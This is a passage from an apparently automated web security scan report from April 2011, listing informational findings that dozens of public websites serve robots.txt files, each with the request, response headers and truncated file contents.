Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...

24.915. http://www.wendys.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wendys.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:08 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753948.392078; expires=Tue, 30-Mar-2021 14:19:08 GMT; path=/
Content-Length: 66
Last-Modified: Tue, 28 Sep 2010 19:38:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: BIGipServerpool-x-www.wendys.com=751369994.4391.0000; path=/

# block crawling of promos folder
User-agent: *
Disallow: /promo/

24.916. http://www.wetpaint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetpaint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wetpaint.com

Response

HTTP/1.1 200 OK
Age: 110207
Cache-Control: max-age=2592000
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:58:42 GMT
Expires: Sun, 01 May 2011 07:21:54 GMT
Last-Modified: Mon, 06 Dec 2010 19:47:54 GMT
Server: prod7
Vary: Accept-Encoding
X-Cache: HIT
X-Cache-Hits: 670
Content-Length: 399
Connection: Close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

24.917. http://www.where2getit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.where2getit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.where2getit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Tue, 23 Mar 2010 18:34:51 GMT
ETag: "13d97b-18-4827c11bcd608"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.918. http://www.whitepages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whitepages.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:13 GMT
Status: 200 OK
X-Runtime: 0.00808
ETag: "265a1e0dd0ef30685663e39bf1ecd640"
Connection: close
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:13 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:13 GMT
Set-Cookie: wp_perm=pid%3DE1OQHF0mEeCF8QAbeC_z-g; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:13 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:13 GMT
Set-Cookie: _wpn_sid=ed61cee5256cecd04646b5f6c89cb2b5; domain=.whitepages.com; path=/
Content-Length: 1006

User-agent: *
Disallow: /dir/*/*/*/
Disallow: /dir*?
Disallow: /*search/Replay
Disallow: /*search/FindAreacode
Disallow: /*search/ReverseAreacode
Disallow: /*search/FindZip
Disallow: /*search/ReverseZ
...[SNIP]...

24.919. http://www.wikia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikia.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
X-Pass-Cache-Control: max-age=86400
X-Cacheable: YES
Content-Length: 3197
Date: Sat, 02 Apr 2011 12:43:57 GMT
Connection: close
X-Served-By: varnish-s3-SJC, varnish-v12-ASH
X-Cache: HIT, HIT
X-Cache-Hits: 3, 44
X-Timer: S1301748237.132179022,VS0,VE0
Vary: Accept-Encoding
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 76945
Cache-Control: max-age=86400

#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# irresponsible, your access to the site may be blocked.
#


...[SNIP]...

24.920. http://www.wikimapia.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimapia.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikimapia.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 02 Apr 2011 13:44:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Sun, 09 May 2010 16:25:13 GMT
ETag: "a690a4e-23e-4be6e1e9"
Accept-Ranges: bytes
Content-Length: 574

User-agent: *
Disallow: /edit_wiki3.php
Disallow: /edit_wiki4.php
Disallow: /edit_wiki5.php
Disallow: /save3.php
Disallow: /save4.php
Disallow: /sys/
Disallow: /sys/edit_wiki3/
Disallow: /sys/edit_wik
...[SNIP]...

24.921. http://www.wikimedia.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimedia.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikimedia.org

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:03:08 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 13:54:29 GMT
ETag: "3f2c-467d4a2ce4f40"
Accept-Ranges: bytes
Content-Length: 16172
Content-Type: text/plain
Age: 1717
X-Cache: HIT from sq76.wikimedia.org
X-Cache-Lookup: HIT from sq76.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

24.922. http://www.wikio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:04 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18
Last-Modified: Fri, 25 Mar 2011 14:04:42 GMT
ETag: "c3b-49f4f134eb280"
Accept-Ranges: bytes
Content-Length: 3131
Cache-Control: max-age=43200, private
Expires: Sun, 03 Apr 2011 01:58:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *


Disallow: /books/
Disallow: /dvd/
Disallow: /cd/
Disallow: /cds/
Disallow: /book/
Disallow: /dvds/

Disallow: /video/vote/
Disallow: /*sort1.html
Disallow: /*sort2.html
Disallow: /add

...[SNIP]...

24.923. http://www.wimp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wimp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wimp.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1232961772"
Last-Modified: Sun, 07 Mar 2010 11:27:13 GMT
Content-Length: 85
Connection: close
Date: Sat, 02 Apr 2011 13:26:05 GMT
Server: lighttpd/1.4.28

User-agent: Mediapartners-Google
Disallow:

User-agent: ia_archiver
Disallow: /

24.924. http://www.winbuyer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winbuyer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winbuyer.com

Response

HTTP/1.1 200 OK
Content-Length: 57
Content-Type: text/plain
Last-Modified: Thu, 06 Jan 2011 11:42:30 GMT
Accept-Ranges: bytes
ETag: "fadc12cd96adcb1:925"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:52 GMT
Connection: close

User-agent: *
Disallow: /gHendlers/
Disallow: /admin/

24.925. http://www.wired.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wired.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "19501a732beb69ddfb1b0016c2f03e37:1298400827"
Last-Modified: Tue, 22 Feb 2011 18:53:47 GMT
Accept-Ranges: bytes
Content-Length: 1701
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:15 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /user/
Disallow: /templatedata/
Disallow: /partnerfeeds/
Disallow: /magazine/polls/
Disallow: /services/emailFriend
Disallow: headerSubscribe
Disallow: inc
...[SNIP]...

24.926. http://www.wisegeek.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisegeek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisegeek.com

Response

HTTP/1.0 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:23:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 27 Oct 2010 09:51:45 GMT
ETag: "77cbe0-114-493962c552e40"
Accept-Ranges: bytes
Content-Length: 276
Content-Type: text/plain

Sitemap: http://www.wisegeek.com/sitemap-index.xml.gz

User-agent: *
Disallow: /s/
Disallow: /templates/
Disallow: /d/
Disallow: /topics/
Disallow: /related/
Disallow: /relevant/

User-Agent: MediaPa
...[SNIP]...

24.927. http://www.wix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wix.com

Response

HTTP/1.0 200 OK
X-Via-Node: sputnik5
Date: Sat, 02 Apr 2011 13:42:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=143019707EC67889193E85226D250F98; Path=/
Content-Language: en-US
Content-Length: 569
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:09 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


User-agent: Googlebot
Disallow: /api/
Disallow: /bo/
Disallow: /editor.jsp
Disallow: /noflashhtml
Disallow: /siteBackHtml
Disallow: /wix/
Disallow: /wixpress/
Disallow: /wixdemo/

...[SNIP]...

24.928. http://www.womansday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womansday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womansday.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 27 Jul 2010 04:15:04 GMT
Accept-Ranges: bytes
Content-Length: 236
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:04:48 GMT
Connection: close

User-agent: *
Disallow: /layout/set/print/
Disallow: /sandbox/
Disallow: /content/
Disallow: /Blogs/
Disallow: /Blogs/Editor-s-Blog/
Disallow: /Blogs/Blogs-Calendar/

Sitemap: http://www.wom
...[SNIP]...

24.929. http://www.wonderhowto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wonderhowto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wonderhowto.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1memql45ho3s3r55iwh3txyh; domain=.wonderhowto.com; path=/; HttpOnly
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 432

User-agent: *
Disallow: /promo/
Disallow: /js/
Disallow: /css/
Disallow: /ajax/
Disallow: /a/
Sitemap: http://www.wonderhowto.com/sitemap.xml
Sitemap: http://www.wonderhowto.com/videositemap.xm
...[SNIP]...

24.930. http://www.worldwinner.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldwinner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:16 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2005 19:16:12 GMT
Accept-Ranges: bytes
Content-Length: 311
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/plain
Connection: close

# robots.txt worldwinner.com
# $Id: robots.txt,v 1.5 2005-03-09 19:16:11 danh Exp $

User-agent: *
Disallow: /cgi/finance
Disallow: /cgi/guestplay
Disallow: /cgi/tournament
Disallow: /cgi/newuser_chec
...[SNIP]...

24.931. http://www.worthpoint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worthpoint.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751475801978; path=/; domain=.worthpoint.com
Last-Modified: Mon, 15 Nov 2010 20:59:31 GMT
ETag: "17b8003-204-4951db76ff2c0"
Accept-Ranges: bytes
Content-Length: 516
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# All robots Block
User-agent: *
Disallow: /profile
Disallow: /login
Disallow: /classfied
Disallow: /auctionhsad
Disallow: /mainCalendar
Disallow: /search
Disallow: /user
Disallow: /worthopedia/*/pric
...[SNIP]...

24.932. http://www.wowhead.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wowhead.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:33:27 GMT
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /search
Disallow: /search/
Disallow: /random
Disallow: /random/
Disallow: /captcha
Disallow: /captcha/
Disallow: /profile=*
Sitemap: http://www.wowhead.com/sitemap

24.933. http://www.wowwiki.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowwiki.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wowwiki.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
X-Pass-Cache-Control: max-age=86400
X-Cacheable: YES
Content-Length: 3199
Date: Sat, 02 Apr 2011 13:46:00 GMT
Connection: close
X-Served-By: varnish-s3-SJC, varnish-i7-IOWA
X-Cache: HIT, HIT
X-Cache-Hits: 6, 89
X-Timer: S1301751960.931620836,VS0,VE0
Vary: Accept-Encoding
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 79869
Cache-Control: max-age=86400

#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# irresponsible, your access to the site may be blocked.
#


...[SNIP]...

24.934. http://www.wsbtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wsbtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Feb 2010 00:10:22 GMT
ETag: "17e8577-176-b5b1780"
Accept-Ranges: bytes
Content-Length: 374
Content-Type: text/plain
Cache-Control: max-age=1819
Expires: Sat, 02 Apr 2011 14:20:53 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d0cfc0400822b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

User-agent: *
Disallow: /print/
Disallow: /404/
Disallow: /cf/
Disallow: /tu/
Disallow: /det/
Disallow: /sh/

User-agent: Googlebot
Disallow: /search/
Disallow: /print/
Disallow: /404/
Disallow: /cf/

...[SNIP]...

24.935. http://www.wunderground.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 02 Dec 2010 18:38:26 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

24.936. http://www.wwe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wwe.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17
Last-Modified: Mon, 28 Mar 2011 21:31:42 GMT
ETag: "4948e14-7b-49f91ab6d8b80"
X-App: p5tyr3
Content-Type: text/plain; charset=utf-8
X-Varnish: 393133231 392989595
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
Content-Length: 123
X-Varnish: 1107614515 1107320412
X-CacheKyte-Server: p5kyte5
X-CacheKyte: HIT
X-CacheKyte-Hits: 5
Cache-Control: public, max-age=43598
Date: Sat, 02 Apr 2011 13:39:43 GMT
Connection: close

sitemap: http://www.wwe.com/sitemap.xml

User-agent: *
Allow: /
Disallow: /node/
Disallow: /admin/
Disallow: /teaser/

24.937. http://www.xanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xanga.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:31 GMT
Connection: close
Content-Length: 257

# robots.txt file for www.xanga.com

User-agent: *
Disallow: /sitemessage.aspx
Disallow: /error.aspx
Disallow: /sorry.aspx
Disallow: /CaptchaImage.axd
Disallow: /randletters.aspx
Disallow: /xa
...[SNIP]...

24.938. http://www.xe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224555110; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 15 Jun 2007 18:48:52 GMT
ETag: "2d002d-29c-4c66ed00"
Accept-Ranges: bytes
Content-Length: 668
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# All crawlers keep out of 8 Day flash directory and flash tutorials
# Always list specific agents first, not last, as it could ignore it otherwise

User-agent: *
Disallow: /learn/8day/flash/
Disallow
...[SNIP]...

24.939. http://www.yakaz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yakaz.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:58:04 GMT
Content-Length: 411
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /results
Disallow: /view
Disallow: /mylist
Disallow: /rss
Disallow: /redirect
Disallow: /r/
Disallow: /s/

User-Agent: Mediapartners-Google
Allow: /results
Disallow: /view
Disa
...[SNIP]...

24.940. http://www.yallwire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yallwire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 21 Jan 2009 22:23:24 GMT
ETag: "232292-4fc-461059aa3cf00"
Accept-Ranges: bytes
Content-Length: 1276
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...

24.941. http://www.yardbarker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Sat, 02 Apr 2011 13:37:46 GMT
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

24.942. http://www.yellow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:56 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.4
Last-Modified: Fri, 25 Feb 2011 22:17:05 GMT
ETag: "5a015a-1e2-49d22b0a69a40"
Accept-Ranges: bytes
Content-Length: 482
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /adbuys/
Disallow: /redir/
Disallow: /webresults.html
Disallow: /tollresults.html
Disallow: /contact/contact.html
Disallow: /best-match/
Disallow: /business-details/
Disallow:
...[SNIP]...

24.943. http://www.yellowbook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellowbook.com

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: text/plain
Content-Location: http://www.yellowbook.com/robots.txt
Last-Modified: Fri, 01 Apr 2011 09:11:27 GMT
Accept-Ranges: bytes
ETag: "5419e5c74cf0cb1:2c1b"
Server: Microsoft-IIS/6.0
WSN: K31
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:58 GMT
Connection: close

...User-agent: *
Disallow: /resources
Disallow: /views
Disallow: /MyYellowbook
Disallow: /myyellowbook
Disallow: /MyYellowBook
Disallow: /clicktocall
Disallow: /link

Sitemap: http://www.yell
...[SNIP]...

24.944. http://www.yellowpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:07 GMT
Status: 200 OK
Connection: close
Server: nginx
Content-Type: text/plain; charset=utf-8
X-Runtime: 1
ETag: "3f10d7693e3c9a99e28bf376ddceced1"
Cache-Control: no-cache
Content-Length: 171
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlYjdkYzU2YjU2YzA5ODBhMWJlNWZiMWM3YWI3OWRhM2U%3D--ff8ac05f5d3eaccfd834536905a3770481723234; path=/; HttpOnly
Set-Cookie: b=10013; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-aeffe5e0-3f54-012e-71a6-00237da0d626
Expires: Sat, 02 Apr 2011 12:43:06 GMT

User-Agent: *
Disallow: /relevance_feedback
Disallow: /images/li.gif
Disallow: /images/logging_requests.gif
User-Agent: 008
Disallow: /
User-Agent: slurp
Crawl-delay: .25

24.945. http://www.yelp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yelp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yelp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:48 GMT
Server: Apache
X-Node: web2, www_all
Accept-Ranges: bytes
Content-Length: 1295
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 12:43:48 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Mode: ro
X-Proxied: lb2

#
# 1. A robot may not injure a human being or, through inaction, allow a
# human being to come to harm.
#
# 2. A robot must obey orders given it by human beings except where such
# orders would confl
...[SNIP]...

24.946. http://www.yidio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yidio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yidio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 27 Jan 2011 22:50:44 GMT
ETag: "31b36d3-1cf-49adbc7983900"
Accept-Ranges: bytes
Content-Length: 463
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /signup.php
Disallow: /login.php
Disallow: /search.php
Disallow: /search_advanced.php
Disallow: /search/
Disallow: /search_new.php
Disallow: /id/
Disallow: /tag/
Noindex: /sig
...[SNIP]...

24.947. http://www.younghollywood.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.younghollywood.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 24 Feb 2011 00:49:15 GMT
ETag: "7413b3-39d-49cfc952898c0"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 07:49:55 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 925
X-Varnish-IP: 192.168.100.137
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 1914680324 1913844177
Age: 21133
Via: 1.1 varnish
Connection: close

User-agent: *
Crawl-delay: 10
Disallow: /other-links/podcast/
Disallow: /podcast.html
Disallow: /libraries/
Disallow: /podcast1/
Disallow: /yh-news/
Disallow: /modules/
Disallow: /news/2007/

...[SNIP]...

24.948. http://www.yourdictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourdictionary.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:38 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 01:06:15 GMT
ETag: "1cd-49d758500cfc0"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:57:38 GMT
Vary: Accept-Encoding,User-Agent
X-LTK-Server: yd-ec2-www
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /business_profile/
Disallow: /ahd/test/
Disallow: /store/
Disallow: /includes/
Disallow: /css/
Disallow: /js/
Disallow: /member/
Disallow: /community/
Disallow: /membe
...[SNIP]...

24.949. http://www.yourfilehost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourfilehost.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:04:47 GMT
Server: Apache/2.2.3 (CentOS)
